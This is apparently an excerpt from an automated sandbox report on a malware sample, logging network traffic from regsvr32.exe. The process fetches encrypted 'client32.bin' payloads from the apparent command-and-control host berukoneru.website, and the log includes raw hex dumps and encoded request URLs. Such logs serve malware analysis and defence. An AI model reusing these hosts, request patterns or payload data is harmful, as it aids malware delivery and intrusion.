                        Data Ascii: ;(\#OE65U_hMT"O#}a14 B~:,86w,e@T48H5IWDL:+)q.?i88Y*\){?Uq<}75>*1)*@&LE'jgaApnHRuVT'g78kX-ps1NjB29[4s\MiV
                        2021-12-14 09:34:07 UTC192INData Raw: a0 19 9a db e6 23 d3 03 86 6f 75 af 47 d5 3f 20 85 14 19 0e b9 d4 63 8c fd 8a 9a af a9 f6 65 42 84 ce cc f3 73 04 88 70 20 03 2e 2d 3a f5 0f cf 45 fe 85 b5 60 0f 38 e4 0f 37 bc bf 4d f6 2c 45 a8 31 d4 65 37 db a7 ee c6 e6 95 0e bc 4a 8a 34 9d a4 0d 59 51 52 14 5c c1 0f 3c ec 47 b1 68 4c 80 4c 71 0c 20 bb b6 5b 7b d7 49 8d 03 7d d5 bb ae cc 8b d0 d0 02 e9 5a 65 53 ae 1e 2c a6 43 6e e2 1e c5 78 ff 67 8f f0 0d d1 d9 1e 13 2c a2 1d df 57 0b e7 72 4f c1 4e fd ee 99 04 21 c1 02 12 96 53 77 8d aa 83 93 27 ff a3 34 86 54 2e 18 ab 65 1d 56 65 e7 f0 fa 9f 11 fb 79 79 cc 44 ad 4a 13 67 7c 78 91 1b 35 3c f6 1d 35 63 f5 35 af 82 78 1c 11 a5 0d 76 24 5c 35 8e 9a 62 ca eb d1 dc 7d 1a a1 82 c4 f1 29 ea 1f 1c 46 3e 42 d1 69 f2 f0 01 dd e9 6b 1b 07 ff 17 68 ac d1 b5 48 8c
                        Data Ascii: #ouG? ceBsp .-:E`87M,E1e7J4YQR\<GhLLq [{I}ZeS,Cnxg,WrON!Sw'4T.eVeyyDJg|x5<5c5xv$\5b})F>BikhH
                        2021-12-14 09:34:07 UTC208INData Raw: 15 93 b0 c9 e5 45 68 a6 ac b4 73 14 04 8b d2 73 37 da 94 58 af 8c 71 a1 da 98 2f 7a 5f 00 68 57 45 4d 6b 23 a3 df ac b7 08 22 c0 21 92 9d 91 8b 92 62 0b c1 a4 d9 31 21 b2 82 fc 16 c3 c2 2c e6 f2 c9 7b 9e ed 62 e8 b1 c5 94 41 f1 99 7a db 30 24 96 ba 10 ac d7 87 21 08 bd c6 d3 02 47 9e 4d 19 3c 56 18 b8 86 af af 82 b6 d8 04 fc 7b 26 3f 88 0f 78 4b de 4d cd 3d 2d 67 48 53 e0 e8 f4 57 ba fb ab 11 65 6b 3f 5a 74 66 d8 6f cd a5 55 54 84 d7 84 2a 96 f0 7b ba fb 3a 40 ae 9a 7e 21 6d 09 fa 90 30 cc af f9 65 a6 50 8e 9b d2 63 fb a0 1f ac 48 d8 90 99 cc 91 db b9 d3 5a f0 df 5d f6 67 0a fc a1 83 ac 70 74 61 2d 1d 54 6f de e8 e2 75 10 9c ed a3 3d b9 89 38 fd 44 93 dc bb be 2a ee 11 5f 06 2e 3b 9d 7d 2a 31 15 93 0e c2 16 3f a1 08 92 6c 38 1e dc 9a b9 14 3b 62 e8 ab b8
                        Data Ascii: Ehss7Xq/z_hWEMk#"!b1!,{bAz0$!GM<V{&?xKM=-gHSWek?ZtfoUT*{:@~!m0ePcHZ]gpta-Tou=8D*_.;}*1?l8;b


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.54979679.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                        TimestampkBytes transferredDirectionData
                        2021-12-14 09:34:07 UTC209OUTGET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:07 UTC210INHTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:07 GMT
                        Content-Type: application/zip
                        Content-Length: 213639
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=703qcv2nu1i02fgfe68euftlm4; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:07 UTC210INData Raw: fa 20 1c 7c 43 17 ce 86 db 4b 72 bb 94 ee 48 40 4a bf 8f e9 2c 5b ea 47 de 7c 6b a3 c0 07 1f 75 79 27 cc 4f 13 37 db a0 64 75 67 27 44 06 94 62 3d 48 9c 68 d9 61 6a d0 2d 9f ee c4 99 6b 5a 7d 2a a8 7a 61 02 68 25 2e c6 05 51 2c 3c a9 d0 f0 20 85 44 a0 e6 75 44 05 09 0e dd 6b 40 f5 0c ce c8 32 78 62 bd 18 eb 3e 4d 07 dc 11 a7 92 4b 99 b7 54 f2 b2 a3 c0 bd 2f 2f bb 85 f4 79 21 4e 8a 91 19 e7 51 35 57 c0 6f a3 24 4c ae e7 9e 1e 57 97 af c0 d4 8c 8a a3 d6 1f 7b 9d ea 00 e4 b0 ae 58 7b 98 80 a4 dd 02 0b b3 21 6b bc 98 e8 6c 18 52 6e 44 78 cc 7a d2 a1 31 6d 95 8a fa 0f 47 53 3d 0b 4d 9d ec 4c 7e b4 b0 00 bd f5 32 ca 9d f6 39 81 49 d4 cc 67 7f 5a b6 d3 b9 57 bc 88 c3 3a 69 5b 38 95 b8 75 a0 6c 39 1d b3 3e a0 ea 5f ef 54 dc 14 77 c6 d3 27 4d f2 5c a7 2f a6 4b 56
                        Data Ascii: |CKrH@J,[G|kuy'O7dug'Db=Hhaj-kZ}*zah%.Q,< DuDk@2xb>MKT//y!NQ5Wo$LW{X{!klRnDxz1mGS=ML~29IgZW:i[8ul9>_Tw'M\/KV
                        2021-12-14 09:34:07 UTC226INData Raw: 37 0d 4a 26 07 ef 84 99 04 24 2d d2 a5 97 36 90 06 1e 40 0c 13 97 05 8d 3b 48 a0 1c bb fe bc 13 9a 21 57 ed df 3c 3f 87 73 02 40 da c3 75 75 da ba aa ab 65 d7 2e 68 08 03 ed ec 4a cd 55 ff 67 38 b6 c0 52 54 a2 5d 4f 34 7a 36 15 b6 f6 f9 19 e7 4b 6e de 07 dd 3f 2b f2 13 e4 40 c8 ca 33 08 92 fe 08 fe e9 24 06 60 04 d0 0f 80 64 2b 5a a4 af 11 ce 4d f0 83 94 21 95 58 75 b0 3a c5 0a 41 74 e5 d1 e6 cb ec d1 10 5a 97 cb 53 54 a0 d5 ff 8e ff cf 43 1c 6d 25 74 5c 1e 50 84 cc 16 14 ca 08 55 7d 40 cb cd 5f 28 dc 06 33 e3 4e 6f 46 14 3f 23 4a 56 c8 49 5a 7e 53 fc 32 ea b7 a4 56 cb 32 1c 95 b2 42 66 98 99 8f 28 a1 88 6e 03 94 d3 7f 10 de 93 62 15 b7 57 7d d0 e0 68 3d e5 9f 59 38 d9 15 ef 9b a0 99 be 42 e4 8a 9d a3 22 55 fd eb 57 2d 41 2e 20 52 7e be e1 57 37 58 7b 93
                        Data Ascii: 7J&$-6@;H!W<?s@uue.hJUg8RT]O4z6Kn?+@3$`d+ZM!Xu:AtZSTCm%t\PU}@_(3NoF?#JVIZ~S2V2Bf(nbW}h=Y8B"UW-A. R~W7X{
                        2021-12-14 09:34:07 UTC242INData Raw: ec 62 9f bc 1d 37 03 80 a9 34 02 cc a6 41 79 a3 1a aa aa aa bf 89 76 05 07 2a 3d 9e 07 aa 5a bd ed ce ff e2 a8 49 49 0e f0 3f c2 12 d5 e1 11 27 72 23 00 77 a4 f5 70 d5 7e d5 36 4b 3b 8c d0 57 5e e2 28 b4 7f 5d 0f ca 46 26 f0 0b 1c f1 a6 c9 b9 66 d7 05 bf 83 4c 8f 4c 75 7a 0f 3a 42 17 db a5 88 a8 6d 2b 54 ae ce 4d a9 0e 7d c1 b5 69 64 34 ce 02 aa ae 23 fe cb 06 a1 c5 8a 8f 95 f9 f6 de 29 90 30 08 46 90 be 1b eb 4f 9c bd d5 3d ef 91 29 52 0e 14 d0 37 45 29 2f de 63 c2 30 a3 f4 b5 96 a1 e5 15 04 64 42 10 2b 99 49 f6 ff ff 19 23 b8 d8 a0 37 bd 58 97 d7 4b 7c 44 c8 c3 b1 f8 47 ce 61 64 d1 a0 18 84 3f 92 6a 72 0a 59 0d 9b c9 c1 7d 5a a3 2f ef 44 db b8 a3 d5 9f 5f 5d 01 71 77 bb 91 3e 30 ce 3f cf 91 ab c0 56 da 5f 51 ed 2f f4 de de a3 17 d5 96 94 1a 34 bf 6c 83
                        Data Ascii: b74Ayv*=ZII?'r#wp~6K;W^(]F&fLLuz:Bm+TM}id4#)0FO=)R7E)/c0dB+I#7XK|DGad?jrY}Z/D_]qw>0?V_Q/4l
                        2021-12-14 09:34:07 UTC258INData Raw: 74 64 30 2b 47 63 05 4e 1a 92 63 4d 88 49 ac 7b 18 e6 66 8d c0 25 d7 7e d9 11 1b 4f 63 60 d7 26 d1 40 d4 34 6e 34 3d 4b 92 e5 d7 a5 9a 3d e3 aa 8b 11 69 45 06 e0 eb dd 13 3b e4 ab 18 fa 5c e3 62 7f 93 bc 12 14 64 16 dd 5a 06 be 89 69 5e 65 ff 7b 27 50 76 26 a1 36 18 4a bf 41 83 8d 32 53 95 00 1e ee 73 11 c9 fb 9d 51 90 3a 39 5a 7b a5 4a 90 93 75 60 b4 a8 34 90 7a 6d e3 26 5d 01 e1 15 2f 75 14 56 2d 3e a3 51 8f 13 c2 d9 a7 d4 f2 74 ac 31 a0 07 61 96 4d e9 74 71 23 a4 75 5c 5f c5 4b 90 38 27 65 6f ef e5 aa 73 dc 30 d3 59 85 05 15 2f 5b 84 86 e4 52 3c 0e a8 bf 8c d0 00 60 7e bd 0d 42 8d 07 ee 5f d2 2a 60 c1 45 57 83 62 9f e1 79 14 87 dc 39 aa 2a 84 fe b0 c0 04 7c 32 47 0d 59 ca 53 c0 a9 0e 70 52 d7 a6 6c b7 d2 50 27 75 f0 af b5 ff ed 71 b5 9e d0 98 b3 70 c0
                        Data Ascii: td0+GcNcMI{f%~Oc`&@4n4=K=iE;\bdZi^e{'Pv&6JA2SsQ:9Z{Ju`4zm&]/uV->Qt1aMtq#u\_K8'eos0Y/[R<`~B_*`EWby9*|2GYSpRlP'uqp
                        2021-12-14 09:34:07 UTC274INData Raw: 06 de ca b6 3b 58 d5 62 cc 8a fb 45 76 21 95 c0 b7 2c 97 8f 7a 17 6a ac dd 76 32 14 48 19 d0 f7 c1 ee d3 57 60 bd a5 93 62 80 9a af 88 21 6c f2 8b 96 f0 d2 d3 34 b0 93 6b e1 52 c5 e0 b9 09 dc 24 7a bd f8 df 67 a9 25 54 e7 de 5c 27 67 d5 fa 59 28 f5 37 6f d4 a7 77 ef 33 f7 a0 57 23 35 bf 1f 26 2f 21 24 2e ac 08 73 bb a6 cc 3e d8 4b 4b fb c3 f7 81 12 0a 84 64 e0 0f 53 9a 23 a7 71 ae d5 f0 ee 0d 75 e0 23 cf 60 07 52 87 2c 23 56 b9 be df 5e 73 1f 46 f8 26 c6 6e c1 c4 ac a0 81 94 36 a2 86 82 0a fc c3 93 e8 ec e7 f6 54 24 ad 75 ad b1 8e ee ec a4 90 7d ee 8b 09 c2 b8 57 51 ba b0 ea 34 67 e2 87 bf 0c 2d 47 77 a1 62 67 a6 0c 1b a3 9e 8c 2f f0 90 c7 cd 2d ac 34 88 21 79 00 a9 d9 15 ae 14 e7 9c 74 d0 c8 de e0 b0 7e 94 ae f8 af a3 a6 cd cc a7 9f f4 c4 d3 b0 23 7c 41
                        Data Ascii: ;XbEv!,zjv2HW`b!l4kR$zg%T\'gY(7ow3W#5&/!$.s>KKdS#qu#`R,#V^sF&n6T$u}WQ4g-Gwbg/-4!yt~#|A
                        2021-12-14 09:34:07 UTC322INData Raw: 1a 8b 8a c2 67 70 7e 71 54 68 79 73 a5 4e ab e3 4a b0 c0 35 cc 84 e5 09 8a 2d d4 b3 61 5c 7c a2 69 40 6d 93 fe 19 95 f1 37 72 e3 a4 cc e1 46 00 36 ad 08 70 09 48 ee df 28 59 f1 dc 84 d8 a6 88 9b 81 17 8e ac 5a 38 1e e3 b0 2c 58 88 bc 3c cc a0 d1 3f c9 e2 cd 71 82 5a a1 c4 49 0c ab e1 5d d1 4f 54 3c 7d a2 ed c9 e0 f5 88 65 0a 91 c0 51 f6 39 73 4c 95 3f e6 b4 ce f9 ff 68 3d da 15 d4 a3 b5 3e 9b f4 35 b5 15 04 36 86 d2 ec 26 ef ad 43 d2 da 21 a2 d9 f4 d3 7e 4c 68 aa bd 8e 8c d2 db 21 9d 03 68 fe f0 e3 c2 17 82 dc 14 81 fc 68 d1 32 7e 48 88 4d 6d a1 89 03 19 4f 65 74 d5 22 c5 7b 46 5c 8e e0 12 37 09 9f 86 e4 8c 00 7a 9c 9e 4c 98 c5 39 45 26 d1 e9 44 94 ff c8 ca 5c a2 f4 33 0d 2a aa 1f d3 4c 1c 0c 3f f3 08 7b a3 eb 7b e7 59 b5 5b bf cb 25 9b 11 72 93 d9 2d e6
                        Data Ascii: gp~qThysNJ5-a\|i@m7rF6pH(YZ8,X<?qZI]OT<}eQ9sL?h=>56&C!~Lh!hh2~HMmOet"{F\7zL9E&D\3*L?{{Y[%r-
                        2021-12-14 09:34:07 UTC338INData Raw: 33 c3 d5 ab 38 83 31 57 4d b0 0c 3c fc 3e 4f d3 9b 72 a3 e4 0c 6c 08 2f ff a4 6c 6a df b6 8c 7b 24 68 b0 0e d2 05 e2 f9 41 46 ca 15 b9 b7 02 0c e3 58 ba 11 31 8b ba 02 3a 0c 84 d5 36 ab 65 24 1f f9 e2 0f 83 47 9a 22 6f 31 de 9f 0f 48 b3 c9 db f9 ab 1d 27 e9 c5 83 98 15 d7 6c 93 b7 0e ed 5f c9 d9 03 df 84 ce 07 03 28 39 eb db c4 21 50 9c 97 90 2c 76 af c5 99 4a 54 f4 ba 0b 5d 24 61 50 81 c0 d8 7d 07 a2 e1 6b 26 5f 8b 7c 88 95 2c 76 4f d0 70 dd 80 88 86 50 b0 40 ad 95 3b 12 bc 72 7c d5 0a 64 6a 9b 5a 3c f4 3f 02 57 75 f9 dc 0a 2e ff 75 10 53 d2 85 61 8f 3f 50 d0 35 57 1d 0c 50 9d e4 f5 fd 6c 84 5d 36 96 76 96 d2 ff 6f b3 fd 55 53 1a c3 bf 4b b6 27 2d e6 3c 55 80 81 fc 5e 8c 97 1a f2 df 24 a3 b6 a9 d1 ef 67 e5 8d 7a 95 79 f4 9d 6e 17 78 d6 28 d0 4a 03 fb b4
                        Data Ascii: 381WM<>Orl/lj{$hAFX1:6e$G"o1H'l_(9!P,vJT]$aP}k&_|,vOpP@;r|djZ<?Wu.uSa?P5WPl]6voUSK'-<U^$gzynx(J
                        2021-12-14 09:34:07 UTC354INData Raw: 36 0c 6a 47 30 19 9c 4e 22 85 cb 33 b8 3c 86 72 6e eb c2 7f 61 f3 63 c9 32 ed 9a 6c 4e 71 21 a3 96 09 5b 1b f6 91 d8 af 7f 12 2f 29 bb 70 ab 1e 8f 4e 86 79 ad f6 43 a3 93 18 7d 1f cd c9 74 b0 36 46 e2 59 f2 66 4d 73 8d 51 79 81 72 ed e3 8b 3b 3c f9 23 bf 04 38 63 7f ed 81 2c 3c 66 e8 4d 85 47 dd da 40 0d f8 54 73 09 8e e5 8d 8d 56 86 3b 42 a5 20 c3 4d 3d 63 e6 81 2e d5 06 d0 40 d4 9b 0d 1b 77 b1 b5 59 66 f4 f3 d3 f0 a4 6a 03 8b d6 85 61 23 74 bb b4 54 a1 fa 5a 96 88 0d 48 0c 10 fc a7 55 bb fe 20 0d e3 f2 af 1a c5 61 fe 3f d1 72 04 af a2 d5 4c 24 76 71 d3 2c 1d 01 cc 92 44 5b b1 61 ea 2f e9 d5 61 5a c7 1d 6f 06 ad 68 4f d1 aa c8 64 89 7c 2f a9 56 0d 9e 5a 98 51 aa 2c 0b 5d 83 9b 9f 16 c2 e5 71 51 02 ea cc 84 39 90 e7 3b ce f7 eb ee e7 16 20 5a 10 d9 b7 22
                        Data Ascii: 6jG0N"3<rnac2lNq![/)pNyC}t6FYfMsQyr;<#8c,<fMG@TsV;B M=c.@wYfja#tTZHU a?rL$vq,D[a/aZohOd|/VZQ,]qQ9; Z"
                        2021-12-14 09:34:07 UTC370INData Raw: f2 e5 3a cd 32 2d ed 92 9d 3f 9d f5 64 8d 06 c5 e4 93 7f 3e 78 36 95 1c 30 12 88 9a 97 7e 9b 10 03 a4 d9 d5 b1 65 9e 77 c5 87 e2 43 68 be db 1f 8e 2e a5 55 62 3c ec df 5b 5e a5 61 b7 69 0c ae ee 83 66 7a f5 00 74 70 c2 44 a6 a0 92 0c 66 fa b1 20 92 77 bf 47 29 d0 51 4a 32 10 65 09 54 81 4f ca 93 25 3b c8 e6 6b f3 3d 7d 97 d1 00 ae 70 9d 06 59 3e 67 79 35 74 ea a1 ac 3c 5d 64 44 b3 02 ea 1a ec 16 0e 15 85 65 8c 11 2a 09 43 5a ad 8a 26 10 f6 44 b8 5c 39 ac e8 dc 38 55 3d 16 98 7a 7d 69 fb c6 57 64 49 89 04 01 eb bc 13 9b d2 51 58 5b b1 c4 77 7c 6c b9 4d 8e af 08 97 af 13 96 8a 13 dc 5b 85 ee 1d d9 f1 cb 2e 8d 50 2f 90 1a 74 47 9d 82 de ef bb d5 4b 2a 1c 36 7f f6 20 e8 e6 00 2f 63 53 d2 32 c8 6f 20 15 e4 5b ee d7 c5 b4 29 0f ad c9 4a db d2 7e b9 b1 d9 bf 4a
                        Data Ascii: :2-?d>x60~ewCh.Ub<[^aifztpDf wG)QJ2eTO%;k=}pY>gy5t<]dDe*CZ&D\98U=z}iWdIQX[w|lM[.P/tGK*6 /cS2o [)J~J
                        2021-12-14 09:34:07 UTC386INData Raw: 20 73 2e 57 0e da 3c 5f 79 54 cf f8 d9 3a ac c6 dd 9b d7 a4 39 61 8d 95 a4 49 72 7c 27 f5 8b 31 15 bb b1 a4 98 cd 3b 78 40 00 11 29 d8 f3 40 3f e5 24 c7 d0 44 db 15 b8 d0 20 72 e0 9d 97 4a eb ec 4c 78 60 b4 20 69 c7 26 d6 35 1e de 8d c2 21 c5 97 6d 4b a5 c3 49 16 5b d8 a6 e0 0f f2 84 9c d1 79 c0 82 53 97 59 e0 08 c2 cf 30 12 b5 5c 01 b9 dd c2 ee c3 36 24 f8 c7 cb e1 8a c7 fc 03 78 4b 1d ee 0a 44 0a 49 e0 cf 70 92 83 7c e4 ea 46 eb b2 dd eb 84 d1 99 14 0d de f8 64 26 f1 4b 89 99 b9 8e 38 6f 50 7d c3 4d a3 5a 10 f5 76 a0 20 0d 92 21 d1 72 f9 e7 a4 63 ff d0 b6 6b 3d b8 b2 cb 9f 53 83 29 ca db b3 aa f0 99 4c c0 77 df 06 d3 91 a4 f3 f3 97 a2 4b d3 ef 25 5c 44 cb 53 4b 0c 61 51 72 38 97 7d aa 8f 25 bb 4f 4d e7 f3 1b 93 67 be 35 a7 6d 10 26 d0 e9 75 49 03 9b fe
                        Data Ascii: s.W<_yT:9aIr|'1;x@)@?$D rJLx` i&5!mKI[ySY0\6$xKDIp|Fd&K8oP}MZv !rck=S)LwK%\DSKaQr8}%OMg5m&uI
                        2021-12-14 09:34:07 UTC402INData Raw: 36 19 cd 54 79 36 2b 6b 10 11 75 b0 3e 40 37 97 94 7d b3 d1 b3 ee 09 71 72 a8 16 9f 4c 06 27 52 09 90 a7 65 25 a4 a4 57 68 42 27 dd 6a 76 21 5f b3 5f 82 fe 88 df 67 74 1f 96 b4 23 a0 83 08 c2 ae 2d 1b fc ae e5 20 42 94 8a d8 7b d9 9b cf c3 7d 90 4b c0 21 97 33 34 d0 18 df fd d8 62 17 9d 9f 04 23 01 17 72 ad d8 e3 c8 36 ab ab 9c 6d a6 22 8a 34 fe 50 67 53 c5 95 c5 00 5e 38 04 78 1c ea fa f3 22 1e 4b 90 85 1f bb 19 f3 e4 1a 2e 5a d5 ee 09 ea 8a 92 12 37 4d 76 8c 5e 86 9a f6 0f 83 42 3d 9c 00 f1 3f 0a b2 7c 5a 8b 07 84 14 3c ee 7d ba 94 3d 04 25 74 dd 76 52 55 08 a3 7a 93 c7 7a 1d ab 8d 97 0e 87 eb b0 78 a9 b1 ef 0f 66 80 8a a6 12 cd 21 8a d8 66 2c bb 2d 78 c2 f3 b8 a0 53 6a 08 0a 6f d7 94 8a 1c 08 1b f7 0c 22 8d 33 21 1c 41 72 82 67 54 6c 50 cb 57 a0 17 74
                        Data Ascii: 6Ty6+ku>@7}qrL'Re%WhB'jv!__gt#- B{}K!34b#r6m"4PgS^8x"K.Z7Mv^B=?|Z<}=%tvRUzzxf!f,-xSjo"3!ArgTlPWt
                        2021-12-14 09:34:07 UTC418INData Raw: 0e 82 3b 28 5c 8a 23 f3 fe ac ea 89 97 4f fd 45 07 36 35 55 85 5f e4 c1 68 4d fa b0 54 a3 22 04 98 4f c7 b5 8d 23 7d b2 61 b6 31 34 20 b7 1b a4 d9 42 0b 7e 84 3a ce e7 2c 38 36 17 77 e7 e4 fc 2c 65 16 40 a0 54 34 a1 13 8a 38 48 80 ff 35 49 57 af 87 44 9a 1f fc e5 4c 13 ed 3a 2b e0 e7 ce 29 ed f9 71 81 2e b2 3f 69 f0 38 cd 38 b1 59 2a 92 fb 5c 83 29 11 0a e0 7b 1c 3f d2 c4 55 e4 71 e3 3c b5 7d 97 37 f4 89 35 3e 2a 90 9a 16 31 29 0e b4 2a 40 26 4c aa 45 d5 c7 d8 27 6a 16 b1 9a 67 61 41 a1 1a ba 9f 70 6e 9e e9 48 f7 c2 cc 52 c9 00 75 56 16 a2 d2 83 54 8f f5 d3 27 87 8d e6 67 d7 b0 37 8c b1 38 87 6b 58 e8 12 fe ec 00 2d fd 70 73 31 4e 6a 42 32 85 39 f6 e8 5b 9a 34 07 d7 bd 73 ea cc e2 da f0 8c 8d 5c ca 99 14 9d fd ba a1 e0 ed 4d 03 be 96 69 17 e0 56 c7 1f 7f
                        Data Ascii: ;(\#OE65U_hMT"O#}a14 B~:,86w,e@T48H5IWDL:+)q.?i88Y*\){?Uq<}75>*1)*@&LE'jgaApnHRuVT'g78kX-ps1NjB29[4s\MiV
                        2021-12-14 09:34:07 UTC482INData Raw: a0 19 9a db e6 23 d3 03 86 6f 75 af 47 d5 3f 20 85 14 19 0e b9 d4 63 8c fd 8a 9a af a9 f6 65 42 84 ce cc f3 73 04 88 70 20 03 2e 2d 3a f5 0f cf 45 fe 85 b5 60 0f 38 e4 0f 37 bc bf 4d f6 2c 45 a8 31 d4 65 37 db a7 ee c6 e6 95 0e bc 4a 8a 34 9d a4 0d 59 51 52 14 5c c1 0f 3c ec 47 b1 68 4c 80 4c 71 0c 20 bb b6 5b 7b d7 49 8d 03 7d d5 bb ae cc 8b d0 d0 02 e9 5a 65 53 ae 1e 2c a6 43 6e e2 1e c5 78 ff 67 8f f0 0d d1 d9 1e 13 2c a2 1d df 57 0b e7 72 4f c1 4e fd ee 99 04 21 c1 02 12 96 53 77 8d aa 83 93 27 ff a3 34 86 54 2e 18 ab 65 1d 56 65 e7 f0 fa 9f 11 fb 79 79 cc 44 ad 4a 13 67 7c 78 91 1b 35 3c f6 1d 35 63 f5 35 af 82 78 1c 11 a5 0d 76 24 5c 35 8e 9a 62 ca eb d1 dc 7d 1a a1 82 c4 f1 29 ea 1f 1c 46 3e 42 d1 69 f2 f0 01 dd e9 6b 1b 07 ff 17 68 ac d1 b5 48 8c
                        Data Ascii: #ouG? ceBsp .-:E`87M,E1e7J4YQR\<GhLLq [{I}ZeS,Cnxg,WrON!Sw'4T.eVeyyDJg|x5<5c5xv$\5b})F>BikhH
                        2021-12-14 09:34:07 UTC498INData Raw: 15 93 b0 c9 e5 45 68 a6 ac b4 73 14 04 8b d2 73 37 da 94 58 af 8c 71 a1 da 98 2f 7a 5f 00 68 57 45 4d 6b 23 a3 df ac b7 08 22 c0 21 92 9d 91 8b 92 62 0b c1 a4 d9 31 21 b2 82 fc 16 c3 c2 2c e6 f2 c9 7b 9e ed 62 e8 b1 c5 94 41 f1 99 7a db 30 24 96 ba 10 ac d7 87 21 08 bd c6 d3 02 47 9e 4d 19 3c 56 18 b8 86 af af 82 b6 d8 04 fc 7b 26 3f 88 0f 78 4b de 4d cd 3d 2d 67 48 53 e0 e8 f4 57 ba fb ab 11 65 6b 3f 5a 74 66 d8 6f cd a5 55 54 84 d7 84 2a 96 f0 7b ba fb 3a 40 ae 9a 7e 21 6d 09 fa 90 30 cc af f9 65 a6 50 8e 9b d2 63 fb a0 1f ac 48 d8 90 99 cc 91 db b9 d3 5a f0 df 5d f6 67 0a fc a1 83 ac 70 74 61 2d 1d 54 6f de e8 e2 75 10 9c ed a3 3d b9 89 38 fd 44 93 dc bb be 2a ee 11 5f 06 2e 3b 9d 7d 2a 31 15 93 0e c2 16 3f a1 08 92 6c 38 1e dc 9a b9 14 3b 62 e8 ab b8
                        Data Ascii: Ehss7Xq/z_hWEMk#"!b1!,{bAz0$!GM<V{&?xKM=-gHSWek?ZtfoUT*{:@~!m0ePcHZ]gpta-Tou=8D*_.;}*1?l8;b


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        10192.168.2.54980779.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                        TimestampkBytes transferredDirectionData
                        2021-12-14 09:34:08 UTC1895OUTGET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:08 UTC1896INHTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:08 GMT
                        Content-Type: application/zip
                        Content-Length: 1869
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=9pokd33d23ohcifgffqmh7mjg6; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:08 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:08 UTC1896INData Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                        Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        11192.168.2.54980879.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                        TimestampkBytes transferredDirectionData
                        2021-12-14 09:34:08 UTC1898OUTGET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:08 UTC1898INHTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:08 GMT
